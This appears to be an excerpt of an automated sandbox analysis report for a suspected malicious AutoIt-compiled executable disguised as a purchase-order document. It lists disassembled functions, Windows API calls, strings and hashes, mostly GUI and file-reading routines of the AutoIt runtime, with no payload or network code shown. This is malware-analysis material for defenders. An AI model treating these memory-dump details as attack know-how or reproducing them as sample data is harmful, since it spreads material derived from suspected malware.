GlobalLock.KERNEL32(00000000), ref: 00459668
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
GlobalUnlock.KERNEL32(00000000), ref: 0045967F
CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
GlobalFree.KERNEL32(00000000), ref: 004596C0
CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
GetStockObject.GDI32(00000011), ref: 004597B7
SelectObject.GDI32(00000000,00000000), ref: 004597BF
GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
DeleteDC.GDI32(00000000), ref: 004597E1
_wcslen.LIBCMT ref: 00459800
_wcscpy.LIBCMT ref: 0045981F
CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
GetDC.USER32(?), ref: 004598DE
SelectObject.GDI32(00000000,?), ref: 004598EE
SelectObject.GDI32(00000000,?), ref: 00459919
ReleaseDC.USER32(?,00000000), ref: 00459925
MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951

Strings

AutoIt v3, xrefs: 004595B5
static, xrefs: 00459606, 00459795
DISPLAY, xrefs: 004597A4
, xrefs: 004598D6

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
String ID: $AutoIt v3$DISPLAY$static
API String ID: 4040870279-2373415609
Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69

Function 00441E05 Relevance: 49.8, APIs: 33, Instructions: 276COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00441E64
SetTextColor.GDI32(?,?), ref: 00441E6C
GetSysColorBrush.USER32(0000000F), ref: 00441E83
GetSysColor.USER32(0000000F), ref: 00441E8F
SetBkColor.GDI32(?,?), ref: 00441EAA
SelectObject.GDI32(?,?), ref: 00441EBA
InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
GetSysColor.USER32(00000010), ref: 00441EF8
CreateSolidBrush.GDI32(00000000), ref: 00441EFF
FrameRect.USER32(?,?,00000000), ref: 00441F10
DeleteObject.GDI32(?), ref: 00441F1B
InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
FillRect.USER32(?,?,?), ref: 00441FB6

Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
String ID:
API String ID: 69173610-0
Opcode ID: d218d880d346c1ecbf0f5b9b78a982ad3551f5cf8a2409a8dc6e180da7254fc7
Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
Opcode Fuzzy Hash: d218d880d346c1ecbf0f5b9b78a982ad3551f5cf8a2409a8dc6e180da7254fc7
Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66

Function 00403E50 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 236COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0042BA84

Strings

#ce, xrefs: 0042BCC0
#comments-start, xrefs: 0042BC2C, 0042BC84
Cannot parse #include, xrefs: 0042BC16
#NoAutoIt3Execute, xrefs: 0042BAC1
#OnAutoItStartRegister, xrefs: 0042BAE3
#include, xrefs: 0042BBBA
Unterminated group of comments, xrefs: 0042BCF9
#include-once, xrefs: 0042BB56
#notrayicon, xrefs: 0042BA7C
#cs, xrefs: 0042BC40, 0042BC98
#requireadmin, xrefs: 0042BA9F
#comments-end, xrefs: 0042BCAC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __wcsnicmp
String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-3360698832
Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE

Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000E), ref: 00433D81
SetTextColor.GDI32(?,00000000), ref: 00433D89
GetSysColor.USER32(00000012), ref: 00433DA3
SetTextColor.GDI32(?,?), ref: 00433DAB
GetSysColorBrush.USER32(0000000F), ref: 00433DBF
GetSysColor.USER32(0000000F), ref: 00433DCB
CreateSolidBrush.GDI32(?), ref: 00433DD4
GetSysColor.USER32(00000011), ref: 00433DEB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
SelectObject.GDI32(?,00000000), ref: 00433E0D
SetBkColor.GDI32(?,?), ref: 00433E19
SelectObject.GDI32(?,?), ref: 00433E29
InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
GetWindowLongW.USER32 ref: 00433E8A
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
DrawFocusRect.USER32(?,?), ref: 00433F1F
GetSysColor.USER32(00000011), ref: 00433F2E
SetTextColor.GDI32(?,00000000), ref: 00433F36
DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
SelectObject.GDI32(?,?), ref: 00433F63
DeleteObject.GDI32(?), ref: 00433F70
SelectObject.GDI32(?,?), ref: 00433F78
DeleteObject.GDI32(00000000), ref: 00433F7B
SetTextColor.GDI32(?,?), ref: 00433F83
SetBkColor.GDI32(?,?), ref: 00433F8F

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1582027408-0
Opcode ID: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
Opcode Fuzzy Hash: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A

Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00456692
GetDesktopWindow.USER32 ref: 004566AA
GetWindowRect.USER32(00000000), ref: 004566B1
GetWindowLongW.USER32(?,000000F0), ref: 0045670D
GetWindowLongW.USER32(?,000000F0), ref: 00456720
DestroyWindow.USER32(?), ref: 00456731
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
IsWindowVisible.USER32(?), ref: 00456812
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
GetWindowRect.USER32(?,?), ref: 0045685C
MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
GetMonitorInfoW.USER32 ref: 00456894
CopyRect.USER32(?,?), ref: 004568A8
SendMessageW.USER32(?,00000412,00000000), ref: 0045690A

Strings

tooltips_class32, xrefs: 00456772
,, xrefs: 00456642
(, xrefs: 0045688C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
String ID: ($,$tooltips_class32
API String ID: 541082891-3320066284
Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A

Function 00454DAA Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 203windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00454DCF
_wcslen.LIBCMT ref: 00454DE2
__wcsicoll.LIBCMT ref: 00454DEF
_wcslen.LIBCMT ref: 00454E04
__wcsicoll.LIBCMT ref: 00454E11
_wcslen.LIBCMT ref: 00454E24
__wcsicoll.LIBCMT ref: 00454E31

Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
FreeLibrary.KERNEL32(00000000), ref: 00454F37
ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
DestroyIcon.USER32(?), ref: 00454FA2
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1

Strings

.icl, xrefs: 00454DDC
.dll, xrefs: 00454E1B
.exe, xrefs: 00454DF9

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 2511167534-1154884017
Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A

Function 00436B3A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 190COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
_wcslen.LIBCMT ref: 00436B79
_wcscpy.LIBCMT ref: 00436B9F
_wcscat.LIBCMT ref: 00436BC0
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
_wcscat.LIBCMT ref: 00436C2A
_wcscat.LIBCMT ref: 00436C31
__wcsicoll.LIBCMT ref: 00436C4B
_wcsncpy.LIBCMT ref: 00436C62

Strings

04090000, xrefs: 00436C16
StringFileInfo\, xrefs: 00436BBA
DefaultLangCodepage, xrefs: 00436C45
%u.%u.%u.%u, xrefs: 00436CCB
\VarFileInfo\Translation, xrefs: 00436BE1

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1503153545-1459072770
Opcode ID: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
Opcode Fuzzy Hash: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE

Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA

_fseek.LIBCMT ref: 004527FC
__wsplitpath.LIBCMT ref: 0045285C
_wcscpy.LIBCMT ref: 00452871
_wcscat.LIBCMT ref: 00452886
__wsplitpath.LIBCMT ref: 004528B0
_wcscat.LIBCMT ref: 004528C8
_wcscat.LIBCMT ref: 004528DD
__fread_nolock.LIBCMT ref: 00452914
__fread_nolock.LIBCMT ref: 00452925
__fread_nolock.LIBCMT ref: 00452944
__fread_nolock.LIBCMT ref: 00452955
__fread_nolock.LIBCMT ref: 00452976
__fread_nolock.LIBCMT ref: 00452987
__fread_nolock.LIBCMT ref: 00452998
__fread_nolock.LIBCMT ref: 004529A9

Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9

__fread_nolock.LIBCMT ref: 00452A39

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
String ID:
API String ID: 2054058615-0
Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6

Function 004559A8 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 401COMMON

Download Yara Rule

Strings

0, xrefs: 00455C2D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
Opcode Fuzzy Hash: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A

Function 004700B0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

GetWindowRect.USER32(?,?), ref: 004701EA
GetClientRect.USER32(?,?), ref: 004701FA
GetSystemMetrics.USER32(00000007), ref: 00470202
GetSystemMetrics.USER32(00000008), ref: 00470216
GetSystemMetrics.USER32(00000004), ref: 00470238
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
GetSystemMetrics.USER32(00000007), ref: 00470273
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
GetSystemMetrics.USER32(00000008), ref: 004702A8
GetSystemMetrics.USER32(00000004), ref: 004702CF
SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
GetClientRect.USER32(?,?), ref: 00470371
GetStockObject.GDI32(00000011), ref: 00470391
SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4

Strings

AutoIt v3 GUI, xrefs: 00470338

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
String ID: AutoIt v3 GUI
API String ID: 867697134-248962490
Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A

Function 00448759 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A

Strings

0, xrefs: 00448A3E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window
String ID: 0
API String ID: 2353593579-4108050209
Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A

Function 0044A0EA Relevance: 31.7, APIs: 21, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 0044A11D
GetClientRect.USER32(?,?), ref: 0044A18D
SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
GetWindowDC.USER32(?), ref: 0044A1B3
GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
ReleaseDC.USER32(?,00000000), ref: 0044A1D6
GetSysColor.USER32(0000000F), ref: 0044A1EC
GetWindowLongW.USER32(?,000000F0), ref: 0044A207
GetSysColor.USER32(0000000F), ref: 0044A216
GetSysColor.USER32(00000005), ref: 0044A21E
GetWindowDC.USER32 ref: 0044A277
GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
